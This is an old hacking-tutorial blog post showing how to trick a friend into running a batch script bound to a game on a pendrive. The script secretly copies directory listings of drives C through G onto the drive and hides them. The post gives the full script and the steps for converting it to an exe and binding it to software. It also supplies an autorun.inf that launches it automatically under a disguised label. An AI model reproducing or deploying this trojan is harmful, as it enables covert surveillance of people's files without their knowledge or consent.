Pages

Tuesday, February 1, 2011

Steal your friends files information by simply giving a pendrive !!!- Hacking

Why this? / What it will do?
This is for the guys who wants to know all the files and folders of their friends computer by simply giving them a removable drive citing game/software

When your friend plugs your pendrive and runs game/software along with it the script executes and will copy all the files/directories to your pendrive and hides them so that your friend cant see them. You can also make it run automatically if autorun option in your friends computer is enabled. Got it?

What do you need?
Notepad, a good game or software which your friend likes,binder(Google it and download), You might need bat to exe converter(Google it and click first link to download)

Getting started:
1.Open notepad and copy the following code and save it as fuz.bat(recommended)
Code:
Name it as fuz.bat
@echo off
Rem Fuzails creation
Title Mfh
Rem version 1.0

Cd c:
tree >> h:\ctree.txt
dir >> h:\cdir.txt
attrib +r +s +h h:\ctree.txt
attrib +r +s +h h:\cdir.txt

Cd d:
tree >> h:\dtree.txt
dir >> h:\ddir.txt
attrib +r +s +h h:\dtree.txt
attrib +r +s +h h:\ddir.txt

Cd e:
tree >> h:\etree.txt
dir >> h:\edir.txt
attrib +r +s +h h:\etree.txt
attrib +r +s +h h:\edir.txt

Cd f:
tree >> h:\ftree.txt
dir >> h:\fdir.txt
attrib +r +s +h h:\ftree.txt
attrib +r +s +h h:\fdir.txt

Cd g:
tree >> h:\gtree.txt
dir >> h:\gdir.txt
attrib +r +s +h h:\gtree.txt
attrib +r +s +h h:\gdir.txt
exit

2.Convert this bat file to exe by converter.
3.Open binder and bind fuz.exe(which you have got in 2nd step) with software/game you want.
4.Copy the file which you get in 3rd step to your pendrive.
5.Open notepad and copy the following code and save it as autorun.inf in your pendrive.
[autorun]
open = fuz.exe
action = A nice game
icon = fuz.exe
6.YOU have done it. Now just give your pendrive to your friend and see what surprises you!!
Note:THIS IS FOR ENTERTAINMENT PURPOSE ONLY. I TAKE NO RESPONSIBILITY FOR WHAT YOU DO WITH IT. A point to be noted is that i am new to blogging but not to hacking.